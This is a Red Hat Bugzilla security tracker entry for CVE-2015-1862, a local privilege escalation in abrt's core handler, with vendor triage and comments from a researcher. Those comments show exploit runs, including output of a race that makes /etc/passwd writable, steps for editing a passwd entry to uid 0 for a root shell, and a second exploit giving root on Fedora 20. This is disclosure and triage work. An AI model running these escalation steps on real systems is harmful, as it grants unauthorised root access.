Bug 1211223 (CVE-2015-1862) - CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Summary: CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Alias: CVE-2015-1862
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On:
Blocks: 1211224 1214172
TreeView+ depends on / blocked
Reported: 2015-04-13 10:58 UTC by Vasyl Kaigorodov
Modified: 2021-02-17 05:25 UTC (History)
14 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Clone Of:
Last Closed: 2015-07-09 05:38:34 UTC

Attachments (Terms of Use)

Description Vasyl Kaigorodov 2015-04-13 10:58:26 UTC
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. 

Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This commit was added to abrt via: (To add support for handling crashes inside containers)

But later removed via:

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:

Comment 2 Francisco Alonso 2015-04-14 13:48:45 UTC
Public via:


Comment 3 Tavis Ormandy 2015-04-14 19:10:49 UTC
It's not obvious to me that abrt in RHEL7 is not affected, are you sure?

I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.

[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt                                  [taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
	Didn't win, trying again!
[snip lots of output]
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
	Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)

Comment 4 Tavis Ormandy 2015-04-14 19:14:29 UTC
In case it isn't obvious, you can easily turn this into a root shell like this:

 $ getent passwd taviso
 taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
 $ vi /etc/passwd
 $ getent passwd taviso
 taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
 $ su taviso
 # id
 uid=0(root) gid=0(root) groups=0(root)

Comment 6 Florian Weimer 2015-04-14 20:13:10 UTC
The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862.  It is currently under investigation.

Comment 7 Huzaifa S. Sidhpurwala 2015-04-15 05:25:03 UTC
Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug related to that particular CVE/flaw.

As mentioned above, since namespaces/chroot support in abrt does not exists in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:


These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.

Comment 9 Vincent Danen 2015-04-15 14:02:30 UTC

Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7

Comment 10 Tavis Ormandy 2015-04-17 21:02:20 UTC
Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
$ cat /etc/fedora-release 
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
$ ./test 
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Comment 11 Huzaifa S. Sidhpurwala 2015-07-09 05:38:34 UTC
Please note: Fedora 20 is now EOL and will not be patched for any flaws.
Closing this flaw.

Note You need to log in before you can comment on or make changes to this bug.